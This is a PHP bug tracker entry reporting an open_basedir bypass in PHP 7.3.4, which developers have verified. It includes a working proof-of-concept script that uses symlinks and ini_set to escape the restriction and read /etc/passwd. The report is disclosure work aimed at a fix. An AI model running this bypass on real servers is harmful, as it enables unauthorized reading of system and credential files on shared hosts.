php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Bug #77850 Open_basedir bypass
Submitted: 2019-04-05 04:48 UTC Modified: 2019-06-18 05:47 UTC
Votes:4
Avg. Score:3.5 ± 1.7
Reproduced:0 of 1 (0.0%)
From: simon dot vikstrom at gmail dot com Assigned:
Status: Verified Package: *Directory/Filesystem functions
PHP Version: 7.3.4 OS: Linux
Private report: No CVE-ID: None
View Add Comment Developer Edit
Anyone can comment on a bug. Have a simpler test case? Does it work for you on a different platform? Let us know!
Just going to say 'Me too!'? Don't clutter the database with that please — but make sure to vote on the bug!
Your email address:
MUST BE VALID
Solve the problem:
31 - 29 = ?
Subscribe to this entry?

 
 [2019-04-05 04:48 UTC] simon dot vikstrom at gmail dot com
Description:
------------
Blaklis_ on twitter published a open_basedir bypass :

https://twitter.com/Blaklis_/status/1113866828739166208



Test script:
---------------
<?php

/*

I could recreat with:

mkdir -p /var/www/html
chmod -R YOURUSER:YOURUSER /var/www 
cd /var/www/html/
php  -d open_basedir=/var/www FILENAME.php

*/

mkdir('/var/www/html/a/b/c/d/e/f/g/',0777,TRUE);
symlink('/var/www/html/a/b/c/d/e/f/g','foo');
ini_set('open_basedir','/var/www/html:bar/');
symlink('foo/../../../../../../','bar');
unlink('foo');
symlink('/var/www/html/','foo');
echo file_get_contents('bar/etc/passwd');


Expected result:
----------------
file_get_contents(): open_basedir restriction in effect.  ....

Actual result:
--------------
Reads /etc/passwd

Patches

Add a Patch

Pull Requests

Add a Pull Request

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2019-05-07 09:48 UTC] sjon@php.net
-Status: Open +Status: Verified
 [2019-05-07 09:48 UTC] sjon@php.net
I can confirm this issue - see https://3v4l.org/75AX0
 [2019-06-18 05:47 UTC] jhdxr@php.net
related discussion: https://externals.io/message/105606
 
PHP Copyright © 2001-2020 The PHP Group
All rights reserved.
Last updated: Fri Nov 27 11:01:24 2020 UTC